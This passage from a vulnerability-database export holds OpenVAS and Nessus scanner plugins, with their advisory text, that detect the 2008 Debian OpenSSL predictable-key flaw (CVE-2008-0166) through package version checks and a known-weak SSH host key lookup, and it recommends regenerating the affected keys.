http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Once the update is applied, weak shared encryption keys and\n SSL/TLS certificates will be rejected where possible (though\n they cannot be detected in all cases). If you are using such\n keys or certificates, OpenVPN will not start and the keys or\n certificates will need to be regenerated.\n\n The safest course of action is to regenerate all OpenVPN\n certificates and key files, except where it can be established\n to a high degree of certainty that the certificate or shared key\n was generated on an unaffected system.\n \n Once the update is applied, you can check for weak OpenVPN shared\n secret keys with the openvpn-vulnkey command.\n \n $ openvpn-vulnkey /path/to/key\n \n OpenVPN shared keys can be regenerated using the openvpn command.\n \n $ openvpn --genkey --secret <file>\n \n Additionally, you can check for weak SSL/TLS certificates by\n installing openssl-blacklist via your package manager, and using\n the openssl-vulkey command.\n \n $ openssl-vulnkey /path/to/key\n \n Please note that openssl-vulnkey only checks RSA private keys\n with 1024 and 2048 bit lengths. If in doubt, destroy the\n certificate and/or key and generate a new one. Please consult the\n OpenVPN documention when recreating SSL/TLS certificates.\n \n Additionally, if certificates have been generated for use on other\n systems, they must be found and replaced as well.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-612-3\";\ntag_affected = \"openvpn vulnerability on Ubuntu 7.04 ,\n Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-612-3/\");\n script_id(840286);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_xref(name: \"USN\", value: \"612-3\");\n script_cve_id(\"CVE-2008-0166\");\n script_name( \"Ubuntu Update for openvpn vulnerability USN-612-3\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU7.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openvpn\", ver:\"2.0.9-5ubuntu0.1\", rls:\"UBUNTU7.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openvpn\", ver:\"2.1~rc7-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"openvpn\", ver:\"2.0.9-8ubuntu0.1\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:10", "bulletinFamily": "scanner", "description": "The remote host is missing an update to openssh\nannounced via advisory DSA 1576-1.", "modified": "2017-07-07T00:00:00", "published": "2008-05-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61029", "id": "OPENVAS:61029", "title": "Debian Security Advisory DSA 1576-1 (openssh)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1576_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1576-1 (openssh)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The recently announced vulnerability in Debian's openssl package\n(DSA-1571-1, CVE-2008-0166) indirectly affects OpenSSH. As a result,\nall user and host keys generated using broken versions of the openssl\npackage must be considered untrustworthy, even after the openssl update\nhas been applied.\n\nFor more information on how to correct and update your system\nto correct for weak keys, please visit the referenced security\nadvisory.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 4.3p2-9etch1. Currently, only a subset of all supported\narchitectures have been built; further updates will be provided when\nthey become available.\n\nFor the unstable distribution (sid) and the testing distribution\n(lenny), these problems have been fixed in version 4.7p1-9.\n\nWe recommend that you upgrade your openssh packages and take the\";\ntag_summary = \"The remote host is missing an update to openssh\nannounced via advisory DSA 1576-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201576-1\";\n\n\nif(description)\n{\n script_id(61029);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-05-27 15:41:50 +0200 (Tue, 27 May 2008)\");\n script_cve_id(\"CVE-2008-0166\", \"CVE-2008-1483\", \"CVE-2007-4752\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_name(\"Debian Security Advisory DSA 1576-1 (openssh)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"openssh-blacklist\", ver:\"0.1.1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh\", ver:\"4.3p2-9etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"4.3p2-9etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"4.3p2-9etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"4.3p2-9etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"4.3p2-9etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "description": "The remote host is missing an update to openssl\nannounced via advisory DSA 1571-1.", "modified": "2017-07-07T00:00:00", "published": "2008-05-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=61027", "id": "OPENVAS:61027", "title": "Debian Security Advisory DSA 1571-1 (openssl)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1571_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1571-1 (openssl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Luciano Bello discovered that the random number generator in Debian's\nopenssl package is predictable. This is caused by an incorrect\nDebian-specific change to the openssl package (CVE-2008-0166). As a\nresult, cryptographic key material may be guessable.\n\nThis is a Debian-specific vulnerability which does not affect other\noperating systems which are not based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into them.\n\nIt is strongly recommended that all cryptographic key material which has\nbeen generated by OpenSSL versions starting with 0.9.8c-1 on Debian\nsystems is recreated from scratch. Furthermore, all DSA keys ever used\non affected Debian systems for signing or authentication purposes should\nbe considered compromised; the Digital Signature Algorithm relies on a\nsecret random value used during signature generation.\n\nThe first vulnerable version, 0.9.8c-1, was uploaded to the unstable\ndistribution on 2006-09-17, and has since propagated to the testing and\ncurrent stable (etch) distributions. The old stable distribution\n(sarge) is not affected.\n\nAffected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key\nmaterial for use in X.509 certificates and session keys used in SSL/TLS\nconnections. Keys generated with GnuPG or GNUTLS are not affected,\nthough.\n\nA detector for known weak key material will be published at:\n\n<http://security.debian.org/project/extra/dowkd/dowkd.pl.gz>\n<http://security.debian.org/project/extra/dowkd/dowkd.pl.gz.asc>\n(OpenPGP signature)\n\nInstructions how to implement key rollover for various packages will be\npublished at:\n\n<http://www.debian.org/security/key-rollover/>\n\nThis web site will be continuously updated to reflect new and updated\ninstructions on key rollovers for packages using SSL certificates.\nPopular packages not affected will also be listed.\n\nIn addition to this critical change, two other vulnerabilities have been\nfixed in the openssl package which were originally scheduled for release\nwith the next etch point release: OpenSSL's DTLS (Datagram TLS,\nbasically SSL over UDP) implementation did not actually implement the\nDTLS specification, but a potentially much weaker protocol, and\ncontained a vulnerability permitting arbitrary code execution\n(CVE-2007-4995). A side channel attack in the integer multiplication\nroutines is also addressed (CVE-2007-3108).\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 0.9.8c-4etch3.\n\nFor the unstable distribution (sid) and the testing distribution\n(lenny), these problems have been fixed in version 0.9.8g-9.\n\nWe recommend that you upgrade your openssl package and subsequently\";\ntag_summary = \"The remote host is missing an update to openssl\nannounced via advisory DSA 1571-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201571-1\";\n\n\nif(description)\n{\n script_id(61027);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-05-27 15:41:50 +0200 (Tue, 27 May 2008)\");\n script_cve_id(\"CVE-2008-0166\", \"CVE-2007-4995\", \"CVE-2007-3108\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1571-1 (openssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"0.9.8c-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8-dbg\", ver:\"0.9.8c-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl0.9.8\", ver:\"0.9.8c-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"0.9.8c-4etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:52", "bulletinFamily": "scanner", "description": "The remote host uses a default SSH host key that is shared among\n multiple installations.", "modified": "2019-02-11T00:00:00", "published": "2016-01-05T00:00:00", "id": "OPENVAS:1361412562310105497", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105497", "title": "Known SSH Host Key", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bad_ssh_host_keys.nasl 13580 2019-02-11 14:26:26Z cfischer $\n#\n# Known SSH Host Key\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105497\");\n script_version(\"$Revision: 13580 $\");\n script_name(\"Known SSH Host Key\");\n script_cve_id(\"CVE-2015-6358\", \"CVE-2015-7255\", \"CVE-2015-7256\", \"CVE-2015-7276\", \"CVE-2015-8251\",\n \"CVE-2015-8260\", \"CVE-2009-4510\", \"CVE-2008-0166\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-11 15:26:26 +0100 (Mon, 11 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-05 13:21:28 +0100 (Tue, 05 Jan 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"ssh_proto_version.nasl\");\n script_require_ports(\"Services/ssh\", 22);\n script_mandatory_keys(\"SSH/fingerprints/available\");\n\n script_xref(name:\"URL\", value:\"https://blog.shodan.io/duplicate-ssh-keys-everywhere/\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/566724\");\n script_xref(name:\"URL\", value:\"http://blogs.intevation.de/thomas/hetzner-duplicate-ed25519-ssh-host-keys/\");\n script_xref(name:\"URL\", value:\"https://www.vsecurity.com/download/advisories/20100409-2.txt\");\n script_xref(name:\"URL\", value:\"https://wiki.debian.org/SSLkeys\");\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2008/dsa-1571\");\n script_xref(name:\"URL\", value:\"https://github.com/g0tmi1k/debian-ssh\");\n\n script_tag(name:\"summary\", value:\"The remote host uses a default SSH host key that is shared among\n multiple installations.\");\n\n script_tag(name:\"impact\", value:\"An attacker could use this situation to compromise or eavesdrop on the SSH\n communication between the client and the server using a man-in-the-middle attack.\");\n\n script_tag(name:\"insight\", value:\"The list of known SSH host keys used by this plugin is a gathered from various\n sources:\n\n - Top 1, 000 Duplicate SSH Fingerprints on the Internet collected via the search engine Shodan in 2015.\n The most common fingerprint was found to be shared among 245.000 installations where the least common was\n still present 321 times.\n\n - SSH host keys generated with a vulnerable OpenSSL version on Debian and derivates (CVE-2008-0166).\n\n - Devices of Multiple Vendors (Cisco, ZTE, ZyXEL, OpenStage, OpenScape, TANDBERG) using hardcoded SSH host keys\n (CVE-2015-6358, CVE-2015-7255, CVE-2015-7256, CVE-2015-7276, CVE-2015-8251, CVE-2015-8260, CVE-2009-4510).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the remote host responds with a known SSH host key.\");\n\n script_tag(name:\"solution\", value:\"Generate a new SSH host key.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n exit(0);\n}\n\ninclude(\"bad_ssh_host_keys.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\"); # For make_list_unique()\n\n# bad_ssh_host_keys.inc might have duplicated host keys for easier\n# maintenance so we will make the list here \"unique\" before\nbad_host_keys = make_list_unique( bad_host_keys );\n\nport = get_ssh_port( default:22 );\n\nforeach algo( ssh_host_key_algos ) {\n\n host_key = get_kb_item( \"SSH/\" + port + \"/fingerprint/\" + algo );\n if( ! host_key || ! strlen( host_key ) )\n continue;\n\n if( in_array( search:host_key, array:bad_host_keys, part_match:FALSE ) ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n\n # Those two are workarounds as we can't include such huge lists into NASL/NVTs.\n # The greps will return something like \"dd:f3:cc:a5:94:95:d3:75:45:be:26:be:1b:13:e0:05\"\n # (including the double apostrophe) if a match was found.\n # nb: Make sure to update the path below if moving the includes or this NVT around.\n if( algo == \"ssh-rsa\" ) {\n argv = make_list( \"grep\", host_key, \"../bad_rsa_ssh_host_keys.txt\" );\n res = pread( cmd:\"grep\", argv:argv, cd:FALSE );\n if( res == '\"' + host_key + '\"' ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n }\n\n if( algo == \"ssh-dss\" ) {\n argv = make_list( \"grep\", host_key, \"../bad_dsa_ssh_host_keys.txt\" );\n res = pread( cmd:\"grep\", argv:argv, cd:FALSE );\n if( res == '\"' + host_key + '\"' ) {\n _report += algo + \" \" + host_key + '\\n';\n bhk_found = TRUE;\n }\n }\n}\n\nif( bhk_found ) {\n report = 'The following known SSH hosts key(s) were found:\\n' + _report;\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:38:16", "bulletinFamily": "scanner", "description": "USN-612-1 fixed vulnerabilities in openssl. This update provides the\ncorresponding updates for ssl-cert -- potentially compromised\nsnake-oil SSL certificates will be regenerated.\n\nA weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nThis vulnerability only affects operating systems which\n(like Ubuntu) are based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into\nthem.\n\nWe consider this an extremely serious vulnerability, and\nurge all users to act immediately to secure their systems.\n(CVE-2008-0166)\n\n== Who is affected ==\n\nSystems which are running any of the following releases :\n\n* Ubuntu 7.04 (Feisty) * Ubuntu 7.10 (Gutsy) * Ubuntu 8.04\nLTS (Hardy) * Ubuntu ", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-612-4.NASL", "href": "https://www.tenable.com/plugins/nessus/32358", "published": "2008-05-16T00:00:00", "title": "Ubuntu 7.04 / 7.10 / 8.04 LTS : ssl-cert vulnerability (USN-612-4)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-612-4. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32358);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n script_xref(name:\"USN\", value:\"612-4\");\n\n script_name(english:\"Ubuntu 7.04 / 7.10 / 8.04 LTS : ssl-cert vulnerability (USN-612-4)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-612-1 fixed vulnerabilities in openssl. This update provides the\ncorresponding updates for ssl-cert -- potentially compromised\nsnake-oil SSL certificates will be regenerated.\n\nA weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nThis vulnerability only affects operating systems which\n(like Ubuntu) are based on Debian. However, other systems\ncan be indirectly affected if weak keys are imported into\nthem.\n\nWe consider this an extremely serious vulnerability, and\nurge all users to act immediately to secure their systems.\n(CVE-2008-0166)\n\n== Who is affected ==\n\nSystems which are running any of the following releases :\n\n* Ubuntu 7.04 (Feisty) * Ubuntu 7.10 (Gutsy) * Ubuntu 8.04\nLTS (Hardy) * Ubuntu 'Intrepid Ibex' (development): libssl\n<= 0.9.8g-8 * Debian 4.0 (etch) (see corresponding Debian\nsecurity advisory)\n\nand have openssh-server installed or have been used to\ncreate an OpenSSH key or X.509 (SSL) certificate.\n\nAll OpenSSH and X.509 keys generated on such systems must be\nconsidered untrustworthy, regardless of the system on which\nthey are used, even after the update has been applied.\n\nThis includes the automatically generated host keys used by\nOpenSSH, which are the basis for its server spoofing and\nman-in-the-middle protection.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/612-4/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ssl-cert package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:ssl-cert\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2019 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(7\\.04|7\\.10|8\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 7.04 / 7.10 / 8.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"7.04\", pkgname:\"ssl-cert\", pkgver:\"1.0.13-0ubuntu0.7.04.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"ssl-cert\", pkgver:\"1.0.14-0ubuntu0.7.10.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"ssl-cert\", pkgver:\"1.0.14-0ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ssl-cert\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:38:16", "bulletinFamily": "scanner", "description": "USN-612-2 introduced protections for OpenSSH, related to the OpenSSL\nvulnerabilities addressed by USN-612-1. This update provides the\ncorresponding updates for OpenSSH in Ubuntu 6.06 LTS. While the\nOpenSSL in Ubuntu 6.06 is not vulnerable, this update will block weak\nkeys generated on systems that may have been affected themselves.\n\nA weakness has been discovered in the random number generator used by\nOpenSSL on Debian and Ubuntu systems. As a result of this weakness,\ncertain encryption keys are much more common than they should be, such\nthat an attacker could guess the key through a brute-force attack\ngiven minimal knowledge of the system. This particularly affects the\nuse of encryption keys in OpenSSH, OpenVPN and SSL certificates.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-612-7.NASL", "href": "https://www.tenable.com/plugins/nessus/32430", "published": "2008-05-22T00:00:00", "title": "Ubuntu 6.06 LTS : openssh update (USN-612-7)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-612-7. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(32430);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/08/02 13:33:02\");\n\n script_cve_id(\"CVE-2008-0166\");\n script_bugtraq_id(29179);\n 